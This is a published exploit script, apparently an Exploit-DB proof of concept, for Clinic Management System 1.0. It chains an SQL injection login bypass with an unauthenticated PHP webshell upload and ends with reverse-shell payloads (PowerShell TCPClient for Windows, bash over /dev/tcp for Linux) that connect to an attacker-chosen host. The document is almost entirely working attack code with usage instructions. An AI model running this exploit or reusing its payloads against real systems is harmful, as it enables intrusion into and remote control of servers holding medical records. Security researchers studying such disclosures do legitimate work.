# Exploit Title: Clinic Management System 1.0 - SQL injection to Remote Code Execution # Date:21/10/2021 # Exploit Author: Pablo Santiago # Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip # Version: 1.0 # Tested on: Windows 7 and Ubuntu 21.10 # References: https://medium.com/@Pablo0xSantiago/clinic-management-system-1-0-sql-injection-bypass-to-remote-code-execution-804bceac037e # Vulnerability: Through SQL injection to bypass the login form it is possible to upload a malicious file and after use that malicious file to execute code in the remote system. # Proof of Concept: import requests import sys import time session = requests.Session() #http_proxy = "http://127.0.0.1:8080" #https_proxy = "https://127.0.0.1:8080" #proxyDict = {"http" : http_proxy, # "https" : https_proxy} def windows(HPW,host,shell_name): payload = """powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()""""" host2 = host+'/'+'uploadImage/Logo/' + shell_name + '.php?cmd='+payload #print(payload) try: request_rce = requests.get(host2,timeout=8) except requests.exceptions.ReadTimeout: pass def linux(HPL,host,shell_name): payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+HPL+'+0>%261"' host2 = host+'/'+'/uploadImage/Logo/' + shell_name + '.php?cmd='+payload #print(payload) try: request_rce = requests.get(host2,timeout=8) except requests.exceptions.ReadTimeout: pass def main(): host = sys.argv[1] shell_name = sys.argv[2] url = host + '/login.php' values = {'user': "admin", 'email': "' OR 1 -- -", 'password': '', 'btn_login': "" } r = session.post(url, data=values) cookie = session.cookies.get_dict()['PHPSESSID'] data = { 'btn_web':''} headers= {'Cookie': 'PHPSESSID='+cookie} request = session.post(host+ '/manage_website.php', data=data, headers=headers,files={"website_image":(shell_name+'.php',"")}) print("") print('[*] Your Simple Webshell was uploaded to ' + host + '/uploadImage/Logo/' + shell_name + '.php' ) print("") LHOST = input('[+] Enter your LHOST: ') LPORT = input('[+] Enter your LPORT: ') print("") HPW= "'"+LHOST+"'"+','+LPORT HPL= ""+LHOST+""+'/'+LPORT print('[+] Option 1: Windows') print('[+] Option 2: Linux') option = input('[+] Choose OS: ') if option == "1": windows(HPW,host,shell_name) exit() elif option == "2": linux(HPL,host,shell_name) exit() else: print("Please choose Windows or Linux") main() #Usage: python3 host shell_name #Example: python3 http://localhost/clinic shell